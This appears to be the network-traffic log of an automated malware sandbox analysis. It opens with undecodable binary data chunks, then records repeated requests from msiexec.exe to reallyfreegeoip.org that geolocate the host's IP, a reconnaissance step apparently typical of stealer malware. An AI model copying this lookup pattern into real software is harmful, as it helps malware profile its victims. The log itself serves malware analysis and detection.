                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: 5b 19 4d 89 12 97 c0 e2 29 37 3e ec 21 7b 23 2d 97 d3 2c 64 85 23 34 92 9a 27 55 7e 22 40 7d 79 9a 84 14 b0 c8 55 8e 55 e2 01 c6 dd 01 3f fb 23 04 32 de d4 c1 6c 2e a6 d7 38 11 37 33 e9 a5 e8 e6 0b b1 5e 84 f6 0a 9e b2 35 cc 2e 2a 34 67 d6 0b df f8 68 fd 30 c7 3a d9 76 1e 4f c7 07 97 5e e0 3f 26 ba 6e 21 58 6a 7e e9 33 c8 de 59 1c e3 06 c4 57 06 db 8f c9 e1 8a 21 64 77 65 61 0f 56 ef 38 d4 e5 d3 c4 b9 f2 65 55 5d 0c 23 f6 d3 9c ac 46 90 35 a9 bf 98 e4 a7 81 b3 9c bd f0 33 e9 3a 93 57 79 19 88 18 a5 54 f2 31 4b 63 e4 d2 ea 3a 90 ec d2 ee 9c c1 70 ed 46 3d ec 5b c0 4c ba e6 83 2f 06 45 42 3d b0 5a 79 7a a4 78 20 74 b7 7a 9e c2 84 0e 3d c8 8d a4 f7 15 e6 7c bd 08 94 73 dd 32 2d 4c 94 5e ec 3a 34 36 ae 06 10 cd b3 99 e2 33 74 3d c5 c1 00 70 8d c5 3d 66 c6 51
                                                                                          Data Ascii: [M)7>!{#-,d#4'U~"@}yUU?#2l.873^5.*4gh0:vO^?&n!Xj~3YW!dweaV8eU]#F53:WyT1Kc:pF=[L/EB=Zyzx tz=|s2-L^:463t=p=fQ
                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: dd 49 3d 06 83 22 a7 ce 91 60 91 eb ff b7 85 a5 fe b4 7d 75 c7 56 54 c1 b6 5f 87 a4 27 7e e8 ce 82 c9 cf c2 bd a7 dc b3 9f 87 f3 4e 9b f7 03 ec c0 78 2b 6f e6 b1 44 2e 4a 11 fb 41 44 39 8e 2b e8 df 88 1e 85 9f f5 22 57 9f e4 d2 ae 75 0f 9d 89 25 db 6f 2c 9a 3b 4c d6 09 06 df 6b 6e 53 13 c1 d0 ac 42 3a d5 51 9c 86 f9 bf 70 de ab 7d ca 61 b3 87 6c 8c bf 53 50 c3 43 13 63 94 01 4f c1 d9 be 30 94 ea 1f 0b fe b0 73 a0 fd 93 c6 f2 81 6b 9e aa 93 dd 5e fe 9f 30 53 fe 2a 80 cb 3b 16 f6 0e ec 4b e3 67 49 9f be 4d 6b fa fb 0f 07 05 a9 53 47 5d f4 e7 51 c8 55 67 07 28 99 dd 45 9a 52 18 6b 0a b2 a1 79 0a 09 2b 10 8c 76 62 ae 2d 80 9a 43 8b ae 0e 83 5c 95 19 8d 70 e8 7f bd 5c c1 52 3b 4d 4f f8 89 12 99 a4 4b 28 3d 48 c3 ab fd 23 2d e3 f6 d2 65 92 71 72 b0 a3 84 43 56
                                                                                          Data Ascii: I="`}uVT_'~Nx+oD.JAD9+"Wu%o,;LknSB:Qp}alSPCcO0sk^0S*;KgIMkSG]QUg(ERky+vb-C\p\R;MOK(=H#-eqrCV
                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: 9c 44 34 4f 3a f1 7b 2f 9d f8 43 cb 30 bc 40 df 63 11 10 0b 89 d8 26 e1 84 2d 91 b3 22 24 aa 10 38 a3 17 3a cb 40 90 7c b5 dd 03 d8 7a bb 77 d3 dc 5d cc aa d1 a0 22 de bc 36 be 2a 37 ff dd 3c 3c 5d c2 77 d5 e6 ce 4e a3 35 24 8d a5 4e a4 5b cf c2 f8 59 9d a1 ff 05 2b 21 78 6d 87 d3 63 1f 38 92 32 59 ef 61 e2 3b 2e 0d 58 31 91 96 3e b4 b9 5b ef 35 6c d7 ad e7 2b 1f ea 18 00 e3 77 ed b4 e0 d0 6c 9f 35 80 f4 5f 1f 97 47 53 fe 45 ba 1e 1d 0e b1 41 45 17 6a 09 2d d5 76 f0 6c f5 70 6f 0d bc 7a c9 b1 31 8e cc 99 09 39 c2 54 4c 05 d9 4b 83 40 a1 d7 07 4d 23 14 1a c8 8c 85 0c fd 20 69 7d a6 bc ad 57 ef 8e 79 38 cc 05 05 bf f7 31 1d b8 dc 7f c5 73 61 e1 35 af b3 69 70 83 b5 ff ec 2e d9 26 19 69 28 26 05 e1 8b 03 b0 87 55 c7 27 8a e5 db 46 1a 1c 52 f6 ee aa 2d 87 71
                                                                                          Data Ascii: D4O:{/C0@c&-"$8:@|zw]"6*7<<]wN5$N[Y+!xmc82Ya;.X1>[5l+wl5_GSEAEj-vlpoz19TLK@M# i}Wy81sa5ip.&i(&U'FR-q
                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: 00 13 94 a0 ee e3 c4 9e ac 13 fd dc 07 5e ee 39 7d dd c8 6d d2 b9 dc 5a a2 b8 3e 7c 71 ce 71 ba 86 d1 fa 3a 03 9a 87 a0 f5 55 e5 bf 54 9d af 36 79 32 87 c1 f5 6c 1d ba 13 42 4c 95 10 a2 5a b9 51 b1 05 3d 58 b7 93 7c c8 e3 ad cb 90 73 a1 b0 a4 fa 5a d1 24 a5 43 2f d8 64 d2 d5 b2 0d ea 3e e1 4c 8e a5 5b be 03 10 5e 9e 2c 3f 4d 96 26 0a 2d 89 f6 37 ec 16 35 58 2d da 30 49 48 25 f1 02 ec 76 7f 63 48 d9 91 22 8b 5a 09 52 1b 17 93 c8 08 f8 81 62 5e f8 43 27 1b 3d a7 22 ea a0 7f 0e 62 22 ce b0 ce f9 b9 28 d7 68 3b e2 c1 54 cd 46 a4 b3 85 50 9d 55 96 e4 23 f8 55 24 ee b1 bc 3d 22 11 bc 08 ae 1b eb 85 51 80 cb eb d0 db 10 93 4d 1a 11 55 45 47 68 24 e4 c2 b6 b0 33 26 54 54 c0 0e c4 9c 4e 3e e4 70 43 09 51 98 f8 ed 65 15 ac 12 e0 6a 7e 15 a9 ac c8 54 06 59 3e c4 39
                                                                                          Data Ascii: ^9}mZ>|qq:UT6y2lBLZQ=X|sZ$C/d>L[^,?M&-75X-0IH%vcH"ZRb^C'="b"(h;TFPU#U$="QMUEGh$3&TTN>pCQej~TY>9


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.1049712188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:20 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-22 14:04:20 UTC896INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:20 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31216
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhL7Bsq%2BcD3P4RDyRA3T4oJMFQf8ego45CFdymQxH7oOZRvlAxv5L3arbKFooqqqqmkP3%2BqEcchM7DopHwkcev%2FW32kiJ5Dejuj0yq9N7k2ckbFVF9jSj1YOh4F6cWHZfA1q%2FvYK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a09342c5a0c03-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2043754&cwnd=244&unsent_bytes=0&cid=b877f01f787eeca4&ts=169&x=0"
                                                                                          2024-10-22 14:04:20 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.1049713188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:21 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-22 14:04:21 UTC896INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:21 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31217
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zh5lhJGD3GwUbrekY16W9H6xPtYHR2g4ibJp9aXk94oM3pxI%2BTTJRL0cSJC4C7TEdKfG8FwLwCHfdkRXy3qYlkHnaWarK9fWkYav6ZBh%2BBo%2BtiKYxLzsXMOkj8xI%2BOl3iJpLA0Pp"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a093a08452e5a-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2126284&cwnd=246&unsent_bytes=0&cid=25220a249c7a6ae4&ts=153&x=0"
                                                                                          2024-10-22 14:04:21 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.1049715188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:22 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-22 14:04:22 UTC896INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:22 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31218
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9OokLckpy%2FLl1qOCfo4GRcH%2B1jE6AqUBAQHBR9dmpp4KHLmPLsfCNeUnznPiDwUwDPMLq5Z5bJAqdAi%2BYfCKAYy8j3wk3CuHXMRps441XutRikGCULGYhgjAKa%2B0gAb7CbZibpd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a094308766c7f-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2594982&cwnd=237&unsent_bytes=0&cid=81d1cd371ca670a7&ts=148&x=0"
                                                                                          2024-10-22 14:04:22 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.1049717188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:24 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-22 14:04:24 UTC890INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:24 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31220
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rnpXTaDZRmrfnsMLG64s9bmLdPJ53J5Uc2hXr0bXUvcpon9GbG5rYPAHckbsm26mgRRhhijpXN0YWPuQp7EwW1OWt0uBrxZluyDysbsPXi4qvTrokKSVzRT8sCaXv%2BjTgPcDCrkN"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a094bed106b3f-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2538124&cwnd=245&unsent_bytes=0&cid=04682ce2c15e719a&ts=152&x=0"
                                                                                          2024-10-22 14:04:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.1049719188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:25 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-22 14:04:26 UTC900INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:25 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31221
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIMwcjscuoV3C1jvB5%2FQCABa7ySWiKG%2BrU7dTgbSE2Fdprcc8Lknjpg%2Bh3W2TO%2Fd2bqDtfYpRcG%2FDz%2BlwyH2lsHzjcLSgsi9bdkz3fPOuoo02dprZcgrwGTZEhySzLYfRiK2Fc9H"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a09563e350b9d-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1863577&cwnd=247&unsent_bytes=0&cid=97d6bb3cec61ff38&ts=151&x=0"
                                                                                          2024-10-22 14:04:26 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.1049721188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:27 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-22 14:04:27 UTC894INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:27 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31223
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9FD6YpnF3dft2mfVcQcO2pQe46hxyIUoE0tynug5n%2Fl1w6IhQA%2F9CtjVZDLvyjQdbNpQCmMsoEbYkHZ3zSf8gwxiske4nO23s44UYTjwZG%2BwvzCxwBFlYbZFanjV9RXpoP78m3a"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a095f3e01e932-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1396335&cwnd=246&unsent_bytes=0&cid=9742994c973b8a01&ts=150&x=0"
                                                                                          2024-10-22 14:04:27 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.1049723188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:28 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-22 14:04:28 UTC891INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:28 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31224
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeGFJJtpLY5sznbbO5W%2FAnofeI853Vv1BB55W4JSMN9fJSHjnM4TZWi7ADcf9GH4UoTeYNp0U2HWU3myB4eDOFfsTQiWH6fuZUth4FHGw%2BVBmXG06ElOfxEbt4KOGD8RLxWYftlX"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a09683d03ddaf-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2159582&cwnd=32&unsent_bytes=0&cid=93239ddee86ed841&ts=153&x=0"
                                                                                          2024-10-22 14:04:28 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


